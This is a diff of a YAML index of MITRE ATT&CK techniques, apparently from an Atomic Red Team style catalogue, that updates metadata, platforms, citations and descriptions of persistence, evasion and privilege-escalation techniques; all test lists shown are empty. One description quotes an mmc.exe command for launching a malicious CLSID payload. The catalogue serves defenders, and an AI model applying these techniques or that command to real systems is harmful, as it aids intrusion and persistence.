@@ -14633,12 +14907,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -14690,9 +14962,8 @@ defense-evasion:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1211:
@@ -14761,7 +15032,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1127:
     technique:
@@ -14808,7 +15078,7 @@ defense-evasion:
         legitimate certificates that allow them to execute on a system and proxy execution
         of malicious code through a trusted process that effectively bypasses application
         control solutions.'
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:37.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Trusted Developer Utilities Proxy Execution
       x_mitre_detection: |-
@@ -14821,12 +15091,13 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_data_sources:
       - 'Command: Command Execution'
+      - 'Module: Module Load'
+      - 'Process: Process Metadata'
       - 'Process: Process Creation'
       x_mitre_defense_bypassed:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1127
     atomic_tests: []
   T1218.014:
@@ -14905,7 +15176,7 @@ defense-evasion:
         mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
         CLSID payload with the following command: <code>mmc.exe -Embedding C:\\path\\to\\test.msc</code>.(Citation:
         abusing_com_reg)"
-      modified: '2022-10-25T14:00:00.188Z'
+      modified: '2022-05-20T17:41:16.112Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: MMC
       x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -14927,7 +15198,6 @@ defense-evasion:
       - Digital Certificate Validation
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1564.010:
     technique:
@@ -14970,7 +15240,7 @@ defense-evasion:
         url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
         description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
           the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2021-11-29T15:56:50.370Z'
       name: Process Argument Spoofing
       description: |-
         Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -14994,8 +15264,6 @@ defense-evasion:
       - 'Process: Process Creation'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1574.012:
     technique:
@@ -15043,7 +15311,7 @@ defense-evasion:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -15081,8 +15349,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 privilege-escalation:
@@ -15131,7 +15397,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
           16, 2017.
         source_name: Microsoft SendNotifyMessage function
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-10T18:29:31.004Z'
       name: 'Process Injection: Extra Window Memory Injection'
       description: "Adversaries may inject malicious code into process via Extra Window
         Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -15183,29 +15449,28 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.011
     atomic_tests: []
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -15252,7 +15517,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -15284,8 +15549,8 @@ privilege-escalation:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -15299,6 +15564,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -15311,11 +15580,14 @@ privilege-escalation:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1037:
@@ -15381,7 +15653,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1574.007:
     technique:
@@ -15470,7 +15741,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.013:
     technique:
@@ -15558,7 +15828,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.013
     atomic_tests: []
   T1543:
@@ -15643,7 +15912,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1546.006:
     technique:
@@ -15675,7 +15943,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
 
         Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:08:21.101Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: LC_LOAD_DYLIB Addition
       x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -15698,11 +15966,10 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -15760,14 +16027,13 @@ privilege-escalation:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1548.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:35:39.112Z'
       name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
       description: |-
         Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -15868,7 +16134,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.002
     atomic_tests: []
   T1548.003:
@@ -15899,7 +16164,7 @@ privilege-escalation:
         description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
           Does. Retrieved March 19, 2018.
         source_name: cybereason osx proton
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-14T16:28:19.781Z'
       name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
       description: |-
         Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -15933,13 +16198,11 @@ privilege-escalation:
       - User
       x_mitre_effective_permissions:
       - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1548.003
     atomic_tests: []
   T1574.011:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:42:48.016Z'
       name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -15958,7 +16221,6 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Matthew Demaske, Adaptforward
@@ -15972,7 +16234,6 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -15999,8 +16260,8 @@ privilege-escalation:
         external_id: T1574.011
       - source_name: Tweet Registry Perms Weakness
         description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
-          April 9, 2018."
-        url: https://twitter.com/r0wdy_/status/936365549553991680
+          September 12, 2024."
+        url: https://x.com/r0wdy_/status/936365549553991680
       - source_name: insecure_reg_perms
         description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
           Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -16031,12 +16292,13 @@ privilege-escalation:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.011
     atomic_tests: []
   T1547:
     technique:
-      modified: '2024-04-16T12:26:07.945Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: Boot or Logon Autostart Execution
       description: |-
         Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
@@ -16108,9 +16370,9 @@ privilege-escalation:
           2017.
         url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Microsoft TimeProvider
         description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
         url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -16126,12 +16388,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547
     atomic_tests: []
   T1547.014:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T14:17:17.353Z'
       name: Active Setup
       description: |-
         Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -16206,12 +16467,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.014
     atomic_tests: []
   T1484.002:
     technique:
-      modified: '2024-04-19T04:27:51.388Z'
+      modified: '2024-09-25T13:50:11.593Z'
       name: Domain Trust Modification
       description: "Adversaries may add new domain trusts, modify the properties of
         existing domain trusts, or otherwise change the configuration of trust relationships
@@ -16231,9 +16491,14 @@ privilege-escalation:
         trust modifications such as altering the claim issuance rules to log in any
         valid set of credentials as a specified user.(Citation: AADInternals zure
         AD Federated Domain) \n\nAn adversary may also add a new federated identity
-        provider to an identity tenant such as Okta, which may enable the adversary
-        to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
-        2023)"
+        provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+        may enable the adversary to authenticate as any user of the tenant.(Citation:
+        Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+        gain broad access into a variety of cloud-based services that leverage the
+        identity tenant. For example, in AWS environments, an adversary that creates
+        a new identity provider for an AWS Organization will be able to federate into
+        all of the AWS Organization member accounts without creating identities for
+        each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -16253,9 +16518,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '2.0'
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -16272,6 +16536,10 @@ privilege-escalation:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1484/002
         external_id: T1484.002
+      - source_name: AWS RE:Inforce Threat Detection 2024
+        description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+          techniques for proactive threat detection. Retrieved September 25, 2024.
+        url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
       - source_name: CISA SolarWinds Cloud Detection
         description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
           in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -16305,7 +16573,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.002
     atomic_tests: []
   T1543.003:
@@ -16461,31 +16728,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.003
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -16502,6 +16749,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -16512,9 +16760,13 @@ privilege-escalation:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -16522,13 +16774,29 @@ privilege-escalation:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1098.003:
     technique:
-      modified: '2024-03-29T18:29:06.873Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Account Manipulation: Additional Cloud Roles'
       description: "An adversary may add additional roles or permissions to an adversary-controlled
         cloud account to maintain persistent access to a tenant. For example, adversaries
@@ -16558,6 +16826,7 @@ privilege-escalation:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Alex Parsons, Crowdstrike
@@ -16568,6 +16837,7 @@ privilege-escalation:
       - Praetorian
       - Alex Soler, AttackIQ
       - Arad Inbar, Fidelis Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
         accounts to identify unusual activity in the assignment of roles to those
@@ -16576,13 +16846,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Office 365
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -16624,9 +16894,6 @@ privilege-escalation:
         url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.003
     atomic_tests: []
   T1547.012:
@@ -16694,19 +16961,18 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.012
     atomic_tests: []
   T1574.001:
     technique:
-      modified: '2024-04-18T22:54:54.668Z'
+      modified: '2024-09-30T17:32:59.948Z'
       name: 'Hijack Execution Flow: DLL Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
 
         There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
 
-        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+        Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
 
         Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
 
@@ -16722,8 +16988,8 @@ privilege-escalation:
       - Travis Smith, Tripwire
       - Stefan Kanthak
       - Marina Liang
-      - Will Alexander
-      - Ami Holeston
+      - Ami Holeston, CrowdStrike
+      - Will Alexander, CrowdStrike
       x_mitre_deprecated: false
       x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
